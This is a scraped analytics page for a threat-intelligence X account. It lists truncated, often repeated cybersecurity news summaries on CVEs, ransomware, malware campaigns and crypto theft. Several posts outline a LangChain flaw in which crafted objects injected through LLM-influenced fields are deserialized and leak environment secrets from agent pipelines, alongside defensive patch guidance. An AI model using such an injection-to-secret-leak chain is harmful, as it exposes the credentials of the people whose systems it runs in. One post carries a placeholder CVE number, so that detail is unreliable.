#  @ThreatSynop ThreatSynop ThreatSynop posts on X about ai, microsoft, $googl, command the most. They currently have [---] followers and [----] posts still getting attention that total [-----] engagements in the last [--] hours. ### Engagements: [-----] [#](/creator/twitter::1895062050126094337/interactions)  - [--] Week [-----] -6.80% - [--] Month [------] +27% - [--] Months [------] +30,212% ### Mentions: [--] [#](/creator/twitter::1895062050126094337/posts_active)  - [--] Month [-----] +36% - [--] Months [-----] +29,283% ### Followers: [---] [#](/creator/twitter::1895062050126094337/followers)  - [--] Week [---] +17% - [--] Month [---] +174% - [--] Months [---] +5,100% ### CreatorRank: [---------] [#](/creator/twitter::1895062050126094337/influencer_rank)  ### Social Influence **Social category influence** [technology brands](/list/technology-brands) [stocks](/list/stocks) [finance](/list/finance) [countries](/list/countries) [social networks](/list/social-networks) [cryptocurrencies](/list/cryptocurrencies) [exchanges](/list/exchanges) [travel destinations](/list/travel-destinations) [automotive brands](/list/automotive-brands) [gaming](/list/gaming) **Social topic influence** [ai](/topic/ai), [microsoft](/topic/microsoft), [$googl](/topic/$googl), [command](/topic/command) #1296, [reduce](/topic/reduce), [target](/topic/target), [data](/topic/data), [crypto](/topic/crypto), [systems](/topic/systems) #2228, [agentic](/topic/agentic) #1593 **Top accounts mentioned or mentioned by** [@transilienceai](/creator/undefined) [@reactnativecommunitycli](/creator/undefined) [@vuln_tracker](/creator/undefined) [@reactrouternode](/creator/undefined) [@remixrunnode](/creator/undefined) [@remixrundeno](/creator/undefined) [@mailio](/creator/undefined) [@vietmoneyreactbigcalendar](/creator/undefined) [@60hz](/creator/undefined) [@adonisjsbodyparser](/creator/undefined) [@username](/creator/undefined) [@tenantonmicrosoftcom](/creator/undefined) [@gmailcom](/creator/undefined) 
[@aliceararau29](/creator/undefined) [@ihackedthegovernment](/creator/undefined) [@lastpassserver8](/creator/undefined) [@sr22vegascom](/creator/undefined) [@lmanchu](/creator/undefined) [@malwarebytes](/creator/undefined) [@reactnativecommunitycliserverapi](/creator/undefined) **Top assets mentioned** [Microsoft Corp. (MSFT)](/topic/microsoft) [Alphabet Inc Class A (GOOGL)](/topic/$googl) [Crowdstrike Holdings Inc (CRWD)](/topic/crowdstrike) [Cloudflare, Inc. (NET)](/topic/cloudflare) [Zscaler Inc (ZS)](/topic/$zs) [IBM (IBM)](/topic/ibm) [ServiceNow Inc (NOW)](/topic/servicenow) [Bitcoin (BTC)](/topic/bitcoin) ### Top Social Posts Top posts by engagements in the last [--] hours "🚨 : On Safer Internet Day February [--] [----] Trend Micro a global cybersecurity leader announced enhancements to its ScamCheck tool to help consumers identify potential scams and address growing AI threats like deepfakes. :: #Cybersecurity #ScamPrevention #AIThreats Is the News Cybersecurity-Related: Yes it focuses on enhancing tools to combat online scams and AI-driven threats. ☠ ( ):: Not specified. 🕷 ( ):: Not applicable. 🌐 ( ):: Global. 🕵 :: This is a new development building upon Trend Micro's ongoing efforts to combat online scams and emerging AI threats. 🔎 ::" [X Link](https://x.com/ThreatSynop/status/1901735321043374433) 2025-03-17T20:40Z [--] followers, [--] engagements "🚨 : The U.S. State Department's Global Engagement Center (GEC) established in [----] to counter foreign disinformation campaigns faced potential closure after its funding was omitted from the National Defense Authorization Act (NDAA) in December [----]. However subsequent legislative actions ensured the continuation of its functions under a new designation. 
:: #GovernmentPolicy #Disinformation #NationalSecurity Is the News Cybersecurity-Related: Yes as it pertains to governmental efforts in combating foreign disinformation which is a significant aspect of cybersecurity and information" [X Link](https://x.com/ThreatSynop/status/1901744867685871784) 2025-03-17T21:18Z [--] followers, [--] engagements "🚨 : CrowdStrike has achieved Federal Risk and Authorization Management Program (FedRAMP) authorization for several modules within its Falcon cybersecurity platform specifically for use in the GovCloud environment. These modules include Falcon Next-Gen SIEM Falcon for IT and Falcon Data Protection all now available to government entities requiring FedRAMP Moderate authorization. :: #Cybersecurity #FedRAMP #GovCloud #CrowdStrike Is the News Cybersecurity-Related: Yes it pertains to the authorization of cybersecurity modules designed to enhance the protection of government entities operating" [X Link](https://x.com/ThreatSynop/status/1901745077946331238) 2025-03-17T21:18Z [--] followers, [--] engagements "🚨 : Google's March [----] security update addresses [--] vulnerabilities affecting Android devices including two actively exploited flaws: CVE-2024-43093 A privilege escalation vulnerability in the Android framework with a CVSS score of [---]. Exploitation requires user interaction allowing attackers to gain elevated privileges without additional execution rights. CVE-2024-50302 : Details unspecified but noted as under limited targeted exploitation. The update includes two patch levels2025-03-01 and 2025-03-05to facilitate timely fixes across various devices. Users of Google Pixel devices" [X Link](https://x.com/ThreatSynop/status/1901973962646507854) 2025-03-18T12:28Z [--] followers, [--] engagements "🚨 : 🚨 Brief Summary of the News: Federal agencies are accelerating digital transformation efforts to meet public expectations and comply with mandates. 
Transitioning securely to platforms like Salesforce requires specialized assistance to ensure data protection and regulatory compliance. Companies like Own Company offer solutions focusing on secure development data recovery and long-term data archiving to support these modernization initiatives. # : #DigitalTransformation #Cybersecurity #DataProtection #GovernmentIT #Compliance Is the News Cybersecurity-Related: Yes. It discusses the" [X Link](https://x.com/ThreatSynop/status/1902129701142790517) 2025-03-18T22:47Z [--] followers, [--] engagements "🚨 : 🚨 CrowdStrike's Falcon platform has achieved Federal Risk and Authorization Management Program (FedRAMP) High Authorization enabling U.S. federal agencies public sector organizations and critical infrastructure entities to secure mission-critical systems and data against cyber threats. This authorization signifies compliance with the highest federal security standards allowing CrowdStrike to protect highly sensitive information across various sectors. # : #Cybersecurity #FedRAMPHigh #GovernmentSecurity #CloudSecurity #Compliance Is the News Cybersecurity-Related: Yes. It pertains to" [X Link](https://x.com/ThreatSynop/status/1902432165343719485) 2025-03-19T18:49Z [--] followers, [--] engagements "🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a **critical vulnerability in HPE OneView** that received a CVSS score of **10.0** the highest possible severity. The flaw (CVE2025XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring potentially allowing an unauthenticated attacker to perform **remote code execution** with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. 
# :" [X Link](https://x.com/ThreatSynop/status/2001816513657864383) 2025-12-19T00:47Z [--] followers, [--] engagements "🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a **critical vulnerability in HPE OneView** that received a CVSS score of **10.0** the highest possible severity. The flaw (CVE2025XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring potentially allowing an unauthenticated attacker to perform **remote code execution** with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. # :" [X Link](https://x.com/ThreatSynop/status/2001817356188717431) 2025-12-19T00:50Z [--] followers, [--] engagements "🚨 : 🚨 The Hacker News discusses the evolving need for **dynamic AI SaaS security** as organizations increasingly adopt softwareasaservice platforms powered by artificial intelligence. The article highlights challenges in securing AIenabled SaaS apps such as API exposure data leakage privilege escalation risks and the complexity of applying traditional security controls to dynamic AI workflows. It emphasizes proactive monitoring contextual access governance continuous anomaly detection and tailored security controls as essential elements for reducing risk in AIcentric SaaS environments. # :" [X Link](https://x.com/ThreatSynop/status/2001818074123485204) 2025-12-19T00:53Z [--] followers, [--] engagements "🚨 : 🚨 WatchGuard released urgent security updates for a critical Fireware OS vulnerability (CVE-2025-14733 CVSS 9.3) that is being actively exploited to achieve remote unauthenticated code execution via the IKEv2 VPN component (iked). The issue affects Mobile User VPN (IKEv2) and Branch Office VPN (IKEv2) when configured with a dynamic gateway peer and WatchGuard published fixed versions (e.g. 2025.1.4 12.11.6 12.5.15 and 12.3.1 Update [--] for FIPS). 
The company also shared indicators of attack/compromise such as abnormal IKE certificate-chain behavior unusually large CERT payloads and iked" [X Link](https://x.com/ThreatSynop/status/2002524188368621906) 2025-12-20T23:39Z [--] followers, [--] engagements "🚨 : 🚨 CISA added a critical ASUS Live Update vulnerability (CVE-2025-59374 CVSS 9.3) to its Known Exploited Vulnerabilities (KEV) catalog after evidence of active exploitation. The flaw is described as an embedded malicious code issue tied to a prior supply-chain compromise in which certain ASUS Live Update client versions were distributed with unauthorized modifications. The compromised builds could trigger unintended actions only on devices that matched specific targeting conditions and the incident is linked to the [----] Operation ShadowHammer campaign disclosed in [----]. ASUS stated the" [X Link](https://x.com/ThreatSynop/status/2002524327321784475) 2025-12-20T23:39Z [--] followers, [--] engagements "🚨 : 🚨 Cisco warned of active attacks exploiting an unpatched maximum-severity zero-day in Cisco AsyncOS (CVE-2025-20393 CVSS 10.0) affecting Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. Cisco said it became aware of the intrusion campaign on December [--] [----] and that only a limited subset of appliances appear affected with attackers gaining root-level command execution and deploying a persistence mechanism. Exploitation requires the Spam Quarantine feature to be enabled and internet-reachable (it is not enabled by default). Cisco observed the actor (UAT-9686) using" [X Link](https://x.com/ThreatSynop/status/2002524350407180689) 2025-12-20T23:39Z [--] followers, [--] engagements "🚨 : 🚨 SonicWall released patches for an actively exploited Secure Mobile Access (SMA) [---] series vulnerability (CVE-2025-40602) that allows local privilege escalation due to insufficient authorization in the Appliance Management Console (AMC). 
SonicWall said attackers have leveraged it in combination with the previously fixed critical flaw CVE-2025-23006 to achieve unauthenticated remote code execution with root privileges. Fixed hotfix builds were issued for affected SMA [---] versions and CISA added CVE-2025-40602 to its Known Exploited Vulnerabilities (KEV) catalog with a short remediation" [X Link](https://x.com/ThreatSynop/status/2002524373349978341) 2025-12-20T23:39Z [--] followers, [--] engagements "🚨 : 🚨 North Korealinked Kimsuky has been linked to a campaign distributing an updated Android malware variant called DocSwap via QR codes on phishing sites spoofing South Koreas CJ Logistics. Victims are lured through pop-ups and delivery-themed social engineering to install a fake security/shipment tracking app from an external server; the dropper decrypts an embedded encrypted APK launches a RAT service and uses decoy OTP-style verification before opening the real CJ Logistics tracking page to reduce suspicion. Once active the malware connects to an attacker server and supports dozens of" [X Link](https://x.com/ThreatSynop/status/2002678826145366048) 2025-12-21T09:53Z [--] followers, [--] engagements "🚨 : 🚨 The Hacker News reports that Hewlett Packard Enterprise (HPE) has released security updates to address a **critical vulnerability in HPE OneView** that received a CVSS score of **10.0** the highest possible severity. The flaw (CVE2025XXXX) impacts the HPE OneView management platform used for infrastructure automation and monitoring potentially allowing an unauthenticated attacker to perform **remote code execution** with elevated privileges. HPE has urged users to apply the patches immediately and provided mitigation guidance to reduce exposure while updates are deployed. 
# :" [X Link](https://x.com/ThreatSynop/status/2002876962310610985) 2025-12-21T23:00Z [--] followers, [--] engagements "🚨 Fake PoCs and AI Slop Are Polluting Vulnerability Response and Creating Dangerous False Negatives AI-generated and non-working proof-of-concept exploits are flooding high-profile vulnerability cycles (highlighted via the React2Shell CVSS [----] case) misleading defenders into thinking theyre safe because scanners built on bad PoCs return not vulnerable. The impact is delayed patching and mis-triage: teams deprioritize real risk while attackers iterate past broken public PoCs and exploit faster than organizations can remediate. 🔹 Key Details: Trend Micro tracked [---] public exploits for" [X Link](https://x.com/ThreatSynop/status/2002879855298257105) 2025-12-21T23:12Z [--] followers, [--] engagements "🚨 Askul RansomHouse Ransomware Breach Exposes 700K+ Records Disrupts Japan Logistics Operations Askul disclosed that a ransomware attack detected on October [--] [----] disrupted its highly automated order/shipping systems and led to the theft and leak of customer partner and employee data with RansomHouse claiming roughly 1TB of stolen files. This matters because it shows how credential-based intrusion plus backup destruction can turn a single enterprise incident into nationwide supply-chain disruption and mass PII exposure. 🕷 Malware: RansomHouse (ransomware / data-extortion) 🎯 Target: Japan" [X Link](https://x.com/ThreatSynop/status/2003467096525512734) 2025-12-23T14:05Z [--] followers, [--] engagements "🚨 Kimsuky Pushes DocSwap Android RAT via QR-Code Phishing Pages Posing as CJ Logistics Kimsuky is using delivery-themed phishing sites that force desktop visitors to scan a QR code leading Android victims to install a trojan SecDelivery.apk dropper that decrypts an embedded APK and launches DocSwap with full RAT control (including data theft and audio/camera/file ops) over an attacker server (27.102.137.181). 
This matters because it blends smishing/phishing QR redirection and convincing OTP-style decoys to bypass unknown sources warnings and turn routine parcel-tracking behavior into" [X Link](https://x.com/ThreatSynop/status/2003844208768000009) 2025-12-24T15:04Z [--] followers, [--] engagements "🚨 ProBit Global Alleged Breach: 700K User Records Offered for Sale on Cybercrime Forum A threat actor claims to be selling a database allegedly tied to ProBit Global containing [------] rows of user data for $2500 USDT including PII (names emails phone DOB full address) and banking details (bank/branch IFSC account holder/name/number). Treat this as unverified until ProBit confirms but the potential impact is high-risk identity fraud targeted phishing and financial-account abuse for affected users. 🕷 Malware: N/A 🎯 Target: South Korea/Cryptocurrency Exchange Users (Global user base) #" [X Link](https://x.com/ThreatSynop/status/2003884137720017375) 2025-12-24T17:43Z [--] followers, [--] engagements "🚨 SideWinder APT Impersonates Indias Income Tax Dept to Deliver DLL Side-Loaded Implant SideWinder (Rattlesnake/APT-C-17) is running a hyper-targeted phishing campaign that lures Indian victims to a fake Income Tax portal and delivers abusing a legit Microsoft Defender binary (SenseCE.exe) to side-load a malicious DLL (MpGear.dll) and stage a resident agent (mysetup.exe) that beacons to C2 while mimicking Chinese enterprise-tool protocols. The chain includes timezone-based geofencing and cloud-hosted payload delivery (URL shorteners + GoFile) to evade reputation-based controls. 
🕷 Malware:" [X Link](https://x.com/ThreatSynop/status/2003898478007619665) 2025-12-24T18:40Z [--] followers, [--] engagements "🚨 Wonderland Android Malware Steals OTPs via Real-Time SMS Hijacking and Remote USSD Control Group-IB reports Wonderland targets Uzbekistan users with dropper-based infections that unpack an encrypted SMS-stealer locally (even without internet) then uses bidirectional WebSocket C2 to execute live commands like SMS sending notification suppression call-forwarding and arbitrary USSD requeststurning phones into remotely operated fraud agents. The operation also hardens itself with fast-changing app/package names anti-analysis checks (emulator/root/Frida) and resilient domain onboarding via a" [X Link](https://x.com/ThreatSynop/status/2003901826408595636) 2025-12-24T18:53Z [--] followers, [--] engagements "🚨 MacSync Stealer Levels Up: Signed + Notarized Swift Dropper Slips Past Gatekeeper Jamf reports MacSync Stealer is now delivered as a fully code-signed and notarized Swift application inside a fake DMG allowing it to pass Gatekeeper checks and quietly fetch/execute a second-stage script from /tmp with rate-limiting and anti-analysis hygiene. This shift materially lowers user friction and detection odds enabling faster credential/data theft under the cover of Apple trust signals. 🕷 Malware: MacSync Stealer 🎯 Target: Global/macOS Users # Category: #macOS #Malware #InfoStealer #MacSync" [X Link](https://x.com/ThreatSynop/status/2003966682163724686) 2025-12-24T23:11Z [--] followers, [--] engagements "🚨 Fake Phantom Shuttle Chrome VPN Extensions Run a Stealth Proxy MITM to Steal Credentials Socket reports two Phantom Shuttle () Chrome extensions have operated since [----] silently injecting hardcoded proxy credentials and forcing traffic for 170+ high-value domains through attacker-controlled proxies to capture logins cookies tokens and form data. 
The extensions also beacon every [--] seconds and periodically exfiltrate user emails and plaintext passwords creating immediate account-takeover and supply-chain risk (GitHub/npm/cloud consoles). 🕷 Malware: Phantom Shuttle (malicious Chrome" [X Link](https://x.com/ThreatSynop/status/2003967230036639990) 2025-12-24T23:13Z [--] followers, [--] engagements "🚨 U.S. Seizes to Disrupt $14.6M Bank Account Takeover Scheme The U.S. Justice Department seized a domain and credential database used as a control panel for criminals running malvertising-based bank account takeovers where fake Google/Bing ads redirected victims to counterfeit bank logins that captured credentials. The FBI has identified at least [--] victims so far with $28M attempted losses and $14.6M confirmed and investigators say the infrastructure supported the operation as recently as November [----]. 🕷 Malware: N/A 🎯 Target: USA/Finance (bank customers targeted via search-ad" [X Link](https://x.com/ThreatSynop/status/2003976539038232621) 2025-12-24T23:50Z [--] followers, [--] engagements "🚨 Cl0p Linked to University of Phoenix Breach Affecting 3.5M People The University of Phoenix is notifying roughly [---] million individuals after an August [----] intrusion attributed to the broader Cl0p extortion ecosystem with exposed data reportedly including high-risk identifiers such as SSNs and bank routing/account details. The key risk is downstream identity theft and financial fraud at scale amplified by highly targeted phishing using verified personal data. 
🕷 Malware: Cl0p (extortion actor) 🎯 Target: USA/Education # Category: #DataBreach #Cl0p #Extortion #HigherEd #PII #IdentityTheft" [X Link](https://x.com/ThreatSynop/status/2003978709565345880) 2025-12-24T23:58Z [--] followers, [--] engagements "🚨 SEC Sues Crypto Investment Clubs That Used Deepfake Ads and WhatsApp to Steal $14M The SEC sued multiple entities behind WhatsApp-based investment clubs that used deepfake videos and fake professors to lure retail investors into opening accounts on sham crypto platforms (Morocoin Berge Cirkor) and buying fake offerings then demanded extra fees when victims tried to withdraw. The scheme allegedly ran Jan 2024Jan [----] and routed stolen funds through overseas banks and crypto wallets. 🕷 Malware: N/A 🎯 Target: USA/Finance (Retail Investors) # Category: #CryptoScam #SEC #InvestmentFraud" [X Link](https://x.com/ThreatSynop/status/2003981977213366527) 2025-12-25T00:11Z [--] followers, [--] engagements "🚨 SEC Charges Firms Behind $14M Crypto Scam Using Fake AI Signals in WhatsApp Investment Clubs The SEC alleges scammers used social-media ads to lure retail investors into WhatsApp investment clubs led by fake professors/assistants pushing supposed AI-generated trade tips then funneled victims to bogus crypto platforms and fake security token offerings before blocking withdrawals and demanding extra fees. At least $14M was stolen and moved offshore through bank accounts and crypto wallets highlighting how AI-themed credibility + closed messaging groups can scale fraud fast. 
🕷 Malware: N/A" [X Link](https://x.com/ThreatSynop/status/2003985848279212308) 2025-12-25T00:27Z [--] followers, [--] engagements "🚨 Everest Ransomware Claims Breaches of Accela and Notin Threatening Massive Data Leaks Everest says it exfiltrated 1TB+ of internal Accela data (including tens of thousands of PDFs/CSVs and backup files) and 145GB from Spains containing sensitive legal workflows and identity documents indicating a high-impact double-extortion play. If validated this creates serious downstream risk for government permitting/licensing processes and notary-related identity theft and fraud. 🕷 Malware: Everest (ransomware / double-extortion) 🎯 Target: USA/GovTech + Spain/Legal Sector # Category: #Ransomware" [X Link](https://x.com/ThreatSynop/status/2003995221617504573) 2025-12-25T01:04Z [--] followers, [--] engagements "🚨 FBI Seizes Backend Panel Used to Run Bank Account Takeovers U.S. authorities seized the domain and its database after criminals used Google/Bing lookalike bank ads to funnel victims to phishing pages and store/operate thousands of stolen banking credentials for account takeover fraud. Investigators linked the scheme to at least [--] U.S. victims with $14.6M in losses (and $28M attempted) with infrastructure still active as recently as November [----]. 🕷 Malware: N/A 🎯 Target: USA/Finance # Category: #FBI #AccountTakeover #Phishing #Malvertising #CredentialTheft #FinancialFraud #DomainSeizure" [X Link](https://x.com/ThreatSynop/status/2004011239291199665) 2025-12-25T02:08Z [--] followers, [--] engagements "🚨 Microsoft Teams Adds Defender-Portal Controls to Block External Users and Domains Microsoft is rolling out an integration that lets security admins manage Teams external blocks (domains and specific email addresses) directly from the Microsoft Defender portal via the Tenant Allow/Block List with support for up to [----] domains and [---] emails. 
This centralizes response to phishing/spam and risky external contacts without changing existing federation/domain block settings in the Teams admin center. 🕷 Malware: N/A 🎯 Target: Global/Enterprise Collaboration (Microsoft Teams) # Category:" [X Link](https://x.com/ThreatSynop/status/2004013416063635680) 2025-12-25T02:16Z [--] followers, [--] engagements "🚨 Fortinet: 5-Year-Old FortiOS SSL VPN 2FA Bypass Now Actively Exploited Fortinet reports in-the-wild abuse of CVE-2020-12812 where attackers can bypass FortiToken 2FA by changing the usernames letter case under specific local user + remote auth (e.g. LDAP) configurations. Patch affected FortiOS releases and audit SSL-VPN auth logs for suspicious case-variant logins and unexpected successful sessions. 🕷 Malware: N/A 🎯 Target: Global/Organizations Running FortiOS SSL-VPN # Category: #Fortinet #FortiOS #SSLVPN #CVE202012812 #2FABypass #Authentication #VPN #PatchManagement #ThreatIntel 🔗" [X Link](https://x.com/ThreatSynop/status/2004959575057834143) 2025-12-27T16:56Z [--] followers, [--] engagements "🚨 ChatGPT Adds Formatting Blocks to Turn Drafts Into Rich-Text Task Editors OpenAI is rolling out formatting blocks that display outputs like emails/blog drafts inside a rich-text area with an inline toolbar (bold lists quotes alignment) letting users edit content directly in ChatGPT instead of copy/pasting into Word or Gmail. 
🕷 Malware: N/A 🎯 Target: Global/ChatGPT Users # Category: #OpenAI #ChatGPT #AI #ProductUpdate #RichText #UX #Productivity 🔗 URL: https://www.bleepingcomputer.com/news/artificial-intelligence/chatgpts-new-formatting-blocks-make-its-ui-look-more-like-a-task-tool/" [X Link](https://x.com/ThreatSynop/status/2004960665853657374) 2025-12-27T17:00Z [--] followers, [--] engagements "🚨 Critical LangChain Flaw Lets Attackers Exfiltrate Secrets via Unsafe Deserialization A critical bug in langchain-core serialization (CVE-2025-68664) enables prompt/LLM-outputinfluenced data to trigger unsafe deserialization paths (e.g. logging/streaming/caching) leaking environment secrets (and potentially enabling further abuse such as SSRF via allowlisted classes). Patch by upgrading langchain-core (fixed in 0.3.81 / 1.2.5) and treat all LLM outputs as untrustedespecially where dumps()/dumpd() and event streaming are used. 🕷 Malware: N/A 🎯 Target: Global/AI Apps & LLM Agent Pipelines #" [X Link](https://x.com/ThreatSynop/status/2004962300092948942) 2025-12-27T17:07Z [--] followers, [--] engagements "🚨 Critical LangChain Serialization Injection Bug Exposes Secrets and May Enable Code Execution A critical flaw in langchain-core (CVE-2025-68664) lets attackers inject crafted lc structures so user-controlled data is treated as LangChain objects during deserialization enabling environment-secret extraction (e.g. when secrets_from_env is enabled) and potentially risky object instantiation paths. Update to langchain-core 1.2.5 or 0.3.81 and restrict deserialization via allowlists to reduce prompt-injection-to-secret-leak chains. 🕷 Malware: N/A 🎯 Target: Global/LLM Apps & Agent Pipelines" [X Link](https://x.com/ThreatSynop/status/2004963932406993234) 2025-12-27T17:13Z [--] followers, [--] engagements "🚨 LangGrinch: Critical LangChain-Core Bug Enables Secret Theft via Serialization Injection (CVE-2025-68664) Attackers can inject crafted lc-key objects through user-influenced fields (e.g. 
metadata additional_kwargs response_metadata) so dumps()/dumpd() content is later deserialized as trusted LangChain objects enabling environment secret extraction (and potentially RCE paths like Jinja2 templating). Upgrade langchain-core to 1.2.5 (or 0.3.81) and enforce the new allowlist-based allowed_objects defaults (with secrets_from_env now disabled). 🕷 Malware: N/A 🎯 Target: Global/LLM Apps & Agent" [X Link](https://x.com/ThreatSynop/status/2004964477649723501) 2025-12-27T17:15Z [--] followers, [--] engagements "🚨 Trust Wallet Chrome Extension Supply-Chain Attack Drains $7M in Crypto A compromised Trust Wallet Chrome extension update (v2.68.0 released Dec 24) injected obfuscated code to exfiltrate wallet secrets to a newly registered domain (api.metrics-trustwallet.com) leading to roughly $7M in theft; attackers also ran a parallel phishing campaign (fix-trustwallet.com) to trick users into surrendering seed phrases. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #Crypto #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #CryptoTheft" [X Link](https://x.com/ThreatSynop/status/2004965021651272121) 2025-12-27T17:18Z [--] followers, [--] engagements "🚨 Trust Wallet Chrome Extension Supply-Chain Hack Drains $7M from Users A compromised Trust Wallet Chrome extension update (v2.68.0 released Dec [--] 2025) contained obfuscated code that exfiltrated seed phrases on import to a look-alike domain enabling rapid wallet draining and parallel phishing via fake fix sites. 
🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #IncidentResponse 🔗 URL: https://cybersecuritynews.com/trustwallet-chrome-extension-hacked/" [X Link](https://x.com/ThreatSynop/status/2004966714975363125) 2025-12-27T17:24Z [--] followers, [--] engagements "🚨 Chaos Ransomware Claims 150GB Leak From Italys Veplastic Chaos ransomware says it breached Veplastic (VEPLASTIC S.r.l.) and moved into the extortion/leak phase after listing the firm on its dark-web site with an alleged 150GB haul. The exposed dataset is described as including financials supplier/customer contracts and contacts proprietary compound formula/specs employee PII and internal communicationscreating both business disruption and IP/identity risk. 🕷 Malware: Chaos Ransomware 🎯 Target: Italy/Manufacturing (Plastics & Industrial Supply Chain) # Category: #Ransomware #Chaos" [X Link](https://x.com/ThreatSynop/status/2004968348375716256) 2025-12-27T17:31Z [--] followers, [--] engagements "🚨 Trust Wallet Chrome Extension Backdoor Drains $7M After Malicious v2.68 Release A malicious Trust Wallet Chrome extension update (v2.68) stole users decrypted mnemonic phrases during wallet unlock and exfiltrated them to api.metrics-trustwallet.com enabling attackers to drain funds ($7M) and launder via exchanges/bridges; Trust Wallet says the release was pushed using a leaked Chrome Web Store API key bypassing normal checks. 🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase" [X Link](https://x.com/ThreatSynop/status/2004969436772794412) 2025-12-27T17:35Z [--] followers, [--] engagements "🚨 China-Linked Evasive Panda Runs DNS Poisoning to Push MgBot via Fake Software Updates Kaspersky says Evasive Panda (StormBamboo/Bronze Highland) poisoned DNS responses to redirect legitimate update checks (e.g. 
SohuVA iQIYI IObit Tencent QQ even requests) to attacker infrastructure delivering a multi-stage loader that decrypts shellcode and installs the MgBot backdoor. This matters because DNS-layer manipulation can silently subvert trusted update flows across specific ISPs/regions enabling high-stealth espionage with minimal endpoint indicators. 🕷 Malware: MgBot 🎯 Target: Trkiye / China" [X Link](https://x.com/ThreatSynop/status/2004969979582558320) 2025-12-27T17:37Z [--] followers, [--] engagements "🚨 Aflac Confirms June Breach Impacting 22M+ Customers Aflac says an unauthorized actor accessed files on June [--] [----] (no ransomware contained within hours) and later determined the incident affected personal data tied to over [--] million individuals triggering large-scale notifications. The impact is high due to potential exposure of sensitive identity/insurance data that can drive fraud identity theft and targeted social engineering. 🕷 Malware: N/A 🎯 Target: USA/Insurance # Category: #DataBreach #Aflac #Insurance #PII #IdentityTheft #IncidentResponse #Cybercrime 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2004970585840087352) 2025-12-27T17:40Z [--] followers, [--] engagements "🚨 Fake Grubhub Holiday Crypto Promotion Emails Push 10x Bitcoin Scam Attackers sent unauthorized emails that appeared to come from Grubhubs legitimate subdomain urging recipients to send Bitcoin to a wallet with a false promise of a 10x payout; Grubhub says it contained the issue and is taking steps to prevent recurrence. 
🕷 Malware: N/A 🎯 Target: Global/Grubhub merchant partners & recipients # Category: #CryptoScam #BusinessEmailCompromise #BrandImpersonation #Phishing #Fraud #EmailSecurity 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2004971671124402478) 2025-12-27T17:44Z [--] followers, [--] engagements

"🚨 Trust Wallet Confirms Malicious Chrome Extension Update Caused $7M Crypto Theft
Trust Wallet says a compromised Chrome extension release (v2.68.0 on Dec 24) included hidden code that exfiltrated wallet secrets to api.metrics-trustwallet.com, enabling $7M in theft, while attackers also pushed a fix-trustwallet.com phishing site to steal recovery phrases. Users should update to v2.69 immediately and move remaining funds to a new wallet/seed if they opened v2.68.0.
🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack" [X Link](https://x.com/ThreatSynop/status/2004972216023142776) 2025-12-27T17:46Z [--] followers, [--] engagements

"🚨 Trust Wallet Urges Immediate Chrome Extension Update After $7M Losses
Trust Wallet says a security incident affecting its Chrome extension v2.68 led to $7M in losses after malicious code decrypted users' mnemonics (using the wallet password) and exfiltrated them to an attacker-controlled domain, enabling rapid wallet draining; users must upgrade to v2.69 and beware of off-channel messages/phishing.
🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #Phishing #IncidentResponse 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2004973301278355461) 2025-12-27T17:51Z [--] followers, [--] engagements

"🚨 TeamViewer DEX NomadBranch Bugs Enable LAN RCE, DoS and Data Exposure
Multiple flaws in TeamViewer DEX Client's Content Distribution Service (NomadBranch.exe) can let an adjacent-network attacker bypass integrity checks for code execution (CVE-2025-44016) or crash/abuse the service for DoS and potential sensitive-data exposure (incl. CVE-2025-12687); fixed in 25.11.0.29 with hotfixes for select legacy branches.
🕷 Malware: N/A 🎯 Target: Global/Windows Enterprise (TeamViewer DEX on shared LAN) # Category: #TeamViewer #DEX #NomadBranch #CVE202544016 #CVE202512687 #CVE202546266 #RCE #DoS" [X Link](https://x.com/ThreatSynop/status/2004974389142401064) 2025-12-27T17:55Z [--] followers, [--] engagements

"🚨 New MongoDB Flaw Lets Unauthenticated Attackers Read Uninitialized Heap Memory (CVE-2025-14847)
A high-severity zlib compression parsing issue (length-field mismatch) can let unauthenticated clients trigger MongoDB to return uninitialized heap memory, potentially disclosing sensitive in-memory data that aids further exploitation; upgrade to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched.
🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #CVE202514847 #Vulnerability #InfoDisclosure #Zlib" [X Link](https://x.com/ThreatSynop/status/2004975476079489150) 2025-12-27T17:59Z [--] followers, [--] engagements

"🚨 Trust Wallet Chrome Extension Supply-Chain Hack Leads to $7M Crypto Theft
Attackers pushed a malicious Trust Wallet Chrome extension update (v2.68) that exfiltrated users' decrypted seed phrases to attacker infrastructure, enabling rapid wallet draining and millions in losses. Users should update to the fixed release and rotate wallets/seeds if they interacted with the compromised version.
🕷 Malware: N/A 🎯 Target: Global/Crypto Wallet Users (Chrome Extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension #SeedPhrase #IncidentResponse #ThreatIntel 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2004976627222999548) 2025-12-27T18:04Z [--] followers, [--] engagements

"🚨 MongoBleed PoC Drops: Unauthenticated MongoDB Memory Leak Now Easy to Exploit
